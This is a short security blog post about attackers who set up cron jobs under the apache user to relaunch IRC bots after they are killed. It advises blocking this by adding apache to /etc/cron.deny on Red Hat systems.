Got some hacker program that keeps relaunching itself? Cannot find the source? Well, you may want to check cron. Recently, we’ve seen several attacks where hackers have setup cron jobs to relaunch their toolkits.
Over the past month, we’ve investigated about a half dozen incidents where a hacker-related process, typically an IRC bot, was running on a server. If we killed the process, it would re-spawn within minutes.
In some cases, we had already removed the PHP scripts that led to the initial exploit, so seeing the process relaunch was suspect. They had to be relaunching the process somehow. Even Apache offline, the process would re-launch. This made me suspect a cron job or similar trick.
In several cases, we’ve found cronjobs setup under the apache user. The attackers had used PHP shell kit to setup a cron job under the apache user. As a result, they could continually re-launch their IRC bots anytime the server admin killed them off.
After patching up the system, we wanted to prevent this trick from being used in the future. This is where cron access control comes in handy.
On Red Hat systems, you can limit who uses cron with /etc/cron.allow and /etc/cron.deny options. By adding the apache user to /etc/cron.deny, you can block hackers from setting up a cron job as apache.
For more details on cron access control, see the Red Hat documentation.